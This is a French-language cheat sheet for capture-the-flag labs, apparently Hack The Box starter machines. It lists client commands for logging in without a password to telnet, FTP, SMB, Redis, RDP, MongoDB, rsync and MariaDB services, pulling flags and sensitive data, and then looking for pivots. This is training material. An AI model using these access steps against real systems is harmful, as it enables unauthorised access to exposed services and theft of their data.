Service ouvert sans authentification

Tu as trouve un service qui accepte les connexions sans mot de passe. C'est le scenario le plus simple : entrer et extraire.

Checklist generale

Se connecter au service
Explorer / enumerer le contenu
Extraire les donnees sensibles (flag, credentials, fichiers)
Chercher des indices pour pivoter vers d'autres services

Scenarios par service

telnet <IP>
# login: root
# Password: (Entree)

→ cat flag.txt

Box : Meow

FTP (port 21) - Connexion anonyme

ftp <IP>
# Name: anonymous
# Password: (Entree)

→ ls → get flag.txt ou get <fichiers_sensibles>

Boxes : Fawn, Crocodile, Funnel

SMB (port 445) - Partage anonyme

smbclient \\\\<IP>\\<share>
# Password: (Entree)

→ ls → cd → get flag.txt

Box : Dancing

Redis (port 6379) - Sans auth

redis-cli -h <IP>

→ select 0 → keys * → get flag

Box : Redeemer

RDP (port 3389) - Administrator sans password

xfreerdp3 /v:<IP> /cert:ignore /u:Administrator

→ Flag sur le bureau

Box : Explosion

MongoDB (port 27017) - Sans RBAC

./mongosh mongodb://<IP>:27017

→ show dbs → use <db> → db.flag.find()

Box : MongoD

Rsync (port 873) - Module public

rsync <IP>::<module>/flag.txt .

Box : Synced

MariaDB (port 3306) - Root sans password

mysql -h <IP> -u root

→ SHOW databases; → USE htb; → SELECT * FROM config;

Box : Sequel

Reflexe apres exploitation

Meme si le flag est directement accessible, ne pas s'arreter la. Chercher :

D'autres fichiers sensibles (credentials, notes)
D'autres bases de donnees / tables
Des indices pour pivoter vers un autre service

Checklist generale​

Scenarios par service​

Telnet (port 23) - Login root sans password​

FTP (port 21) - Connexion anonyme​

SMB (port 445) - Partage anonyme​

Redis (port 6379) - Sans auth​

RDP (port 3389) - Administrator sans password​

MongoDB (port 27017) - Sans RBAC​

Rsync (port 873) - Module public​

MariaDB (port 3306) - Root sans password​

Reflexe apres exploitation​